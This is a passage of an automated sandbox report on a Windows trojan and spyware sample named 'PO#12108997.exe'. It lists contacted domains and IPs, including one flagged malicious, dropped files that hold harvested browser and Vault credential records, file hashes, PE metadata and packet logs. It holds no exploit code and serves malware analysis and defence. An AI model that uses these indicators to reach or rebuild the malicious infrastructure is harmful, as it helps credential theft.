                              http://www.fontbureau.com/designers/cabarga.htmlNPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/zPO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnPO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlPO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gDcmmon32.exe, 00000011.00000002.504685915.000000000558F000.00000004.10000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.comalsPO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.comalicPO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/cPO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com~PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    188.114.97.10
                                    		www.madurababe.netEuropean Union
                                    		13335CLOUDFLARENETUStrue
                                    34.102.136.180
                                    		tyz.worldUnited States
                                    		15169GOOGLEUSfalse

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:626541
                                    Start date and time: 14/05/202211:53:092022-05-14 11:53:09 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 58s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:PO#12108997.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:27
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@7/6@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 32% (good quality ratio 29.2%)
                                    • Quality average: 73.3%
                                    • Quality standard deviation: 31%
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    11:54:17API Interceptor1x Sleep call for process: PO#12108997.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO#12108997.exe.log

                                    Download File
                                    Process:C:\Users\user\Desktop\PO#12108997.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1308
                                    Entropy (8bit):5.345811588615766
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                    MD5:2E016B886BDB8389D2DD0867BE55F87B
                                    SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                    SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                    SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                    C:\Users\user\AppData\Local\Temp\DB1

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.792852251086831
                                    Encrypted:false
                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogim.jpeg

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmmon32.exe
                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                    Category:dropped
                                    Size (bytes):83657
                                    Entropy (8bit):7.898144284385867
                                    Encrypted:false
                                    SSDEEP:1536:CG5dxi4H6Ji4C92fQy4tmleny1AJYkD+EM7S/t+kZ+jCsM6tqQ8:/ftYCYfTwmlEJYT91kpX6A
                                    MD5:B8F7447E7C46C85E512668F1E706AA10
                                    SHA1:8FBFEAF83150331DED8B76987DB1101988492A02
                                    SHA-256:0EC4EA12EE1EDB1D346E29348D668274BC4AC3A7A933FEA46344C228987109F1
                                    SHA-512:B98745DC4AFD7FF38734A25ED0ED30FB1C786FAFCFA40868DB2FF7190BC3FF46E5602BA175CF49491D209CCEBAA9D110167287D307FD3AD52D400BF174705016
                                    Malicious:false
                                    Reputation:low
                                    Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\...x....Mj}9oE...7....*......]..(...x..:.e...+..6..r.....#XP.Q^(.*uz.........G...V_.~....3.c.o.?g.......z.8...Q...9(.Z.'.C...U...5..+....)h...i)M.,c.%z.....-..u.......#?.O.{..../.....x.?.......;~(..N.z...r..?.....*..X.[G...H..%..m...].U..n.&t..y".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%..

                                    C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogrg.ini

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmmon32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):38
                                    Entropy (8bit):2.7883088224543333
                                    Encrypted:false
                                    SSDEEP:3:rFGQJhIl:RGQPY
                                    MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                    SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                    SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                    SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

                                    C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmmon32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):40
                                    Entropy (8bit):2.8420918598895937
                                    Encrypted:false
                                    SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                    MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                    SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                    SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                    SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                    Malicious:true
                                    Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

                                    C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogrv.ini

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmmon32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):210
                                    Entropy (8bit):3.482329440248704
                                    Encrypted:false
                                    SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4yRl2rK9dEoY:MlIaExGNYvOI6x4+2rqY
                                    MD5:F06976F974E77FCC372A01603909BA74
                                    SHA1:8810DEB0B9350EB4B9A4944FE488551275C2AEDA
                                    SHA-256:D47B5E60BF213D7462CD33A88D49525F3386D773016DAE2AFADE8F4B5A330EFB
                                    SHA-512:742E06D22ACAA67705C3E31C32B3F2D086C509D1E5051EB431EF4D80BAF4F07742E415599EAE4E1200420F64F045D56A321A980F339B18052211AE44FD3437F2
                                    Malicious:true
                                    Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.i.y.v.x.c.v.d.z.s.g.u.h.l.n.....A.u.t.:.......P.a.s.s.:.......

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.7372852843844555
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:PO#12108997.exe
                                    File size:655872
                                    MD5:5f6801fb007ede49a68943ef905b54c6
                                    SHA1:a01e755201a0f7caec5b123db1d26776948d33c4
                                    SHA256:ce5e4278243ecbcd11f46db7a76dc39f0ce091914bf298af73fb4e1e5391441b
                                    SHA512:c6654f13807ce635733cb1c2395bcc82799fba03b92f679b926afd2547e5f7c06f3ee581e7116554c830593ea4a0d5606ae392d7fff155d9e2f07415106c37db
                                    SSDEEP:12288:XqIaPToULJVomEffELKPc9ok5l0ui0vOO6DKA7A8EZGFWA4n8WZkD+00akdfrYLm:i9Vo9OKPcyk55iYaD77hEZ4MnjkD+7aq
                                    TLSH:6BD4F17EE9E39F11C7282371D4D21E001735562AF2B3F3AF1B4A42E48A02BD79955B87
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@.}b..............0.................. ... ....@.. .......................`............@................................

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x4a198e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x627DEF40 [Fri May 13 05:40:16 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa19400x4b.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x38c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa40000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xa18f90x1c.text
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x9f9940x9fa00False0.869802882733data7.74619611944IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0xa20000x38c0x400False0.37109375data2.87055445871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xa40000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_VERSION0xa20580x334data

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyrightCopyright 2017
                                    Assembly Version1.0.0.0
                                    InternalNameActivityCont.exe
                                    FileVersion1.0.0.0
                                    CompanyName
                                    LegalTrademarks
                                    Comments
                                    ProductNameResetEvent
                                    ProductVersion1.0.0.0
                                    FileDescriptionResetEvent
                                    OriginalFilenameActivityCont.exe

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    May 14, 2022 11:55:46.679997921 CEST4981080192.168.2.334.102.136.180
                                    May 14, 2022 11:55:46.695856094 CEST804981034.102.136.180192.168.2.3
                                    May 14, 2022 11:55:46.696001053 CEST4981080192.168.2.334.102.136.180
                                    May 14, 2022 11:55:46.696173906 CEST4981080192.168.2.334.102.136.180
                                    May 14, 2022 11:55:46.711947918 CEST804981034.102.136.180192.168.2.3
                                    May 14, 2022 11:55:46.808926105 CEST804981034.102.136.180192.168.2.3
                                    May 14, 2022 11:55:46.808959007 CEST804981034.102.136.180192.168.2.3
                                    May 14, 2022 11:55:46.809115887 CEST4981080192.168.2.334.102.136.180
                                    May 14, 2022 11:55:46.809161901 CEST4981080192.168.2.334.102.136.180
                                    May 14, 2022 11:55:47.205697060 CEST4981080192.168.2.334.102.136.180
                                    May 14, 2022 11:55:47.221733093 CEST804981034.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.860255003 CEST4981180192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.876513004 CEST804981134.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.876677990 CEST4981180192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.880199909 CEST4981180192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.880264044 CEST4981180192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.881323099 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.896313906 CEST804981134.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.899012089 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.899105072 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.901112080 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.901673079 CEST804981134.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.917469978 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.917516947 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.917548895 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.917574883 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.917602062 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.917628050 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.917650938 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.917695045 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.917702913 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.917709112 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.917714119 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.918806076 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.918840885 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.918875933 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.918903112 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933609009 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933653116 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933682919 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933706999 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.933715105 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933733940 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.933742046 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933768034 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.933770895 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933799028 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933825016 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933828115 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.933871984 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.933890104 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.933923960 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933975935 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.933984995 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.934031963 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.934113026 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934149027 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934170008 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.934176922 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934207916 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.934209108 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934236050 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.934264898 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.934288979 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934345007 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.934416056 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934448957 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934468985 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.934482098 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934505939 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.934509039 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934534073 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.934602022 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.949783087 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.949831963 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.949863911 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.949894905 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.949927092 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.949930906 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.949933052 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.949991941 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.950037956 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950134993 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.950177908 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950232983 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.950375080 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950407028 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950433969 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950438023 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.950459957 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950472116 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.950486898 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.950520992 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.950589895 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950623989 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950649023 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.950651884 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950675964 CEST4981280192.168.2.334.102.136.180
                                    May 14, 2022 11:55:48.950680017 CEST804981234.102.136.180192.168.2.3
                                    May 14, 2022 11:55:48.950705051 CEST804981234.102.136.180192.168.2.3

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    May 14, 2022 11:55:46.587146044 CEST5258153192.168.2.38.8.8.8
                                    May 14, 2022 11:55:46.636457920 CEST53525818.8.8.8192.168.2.3
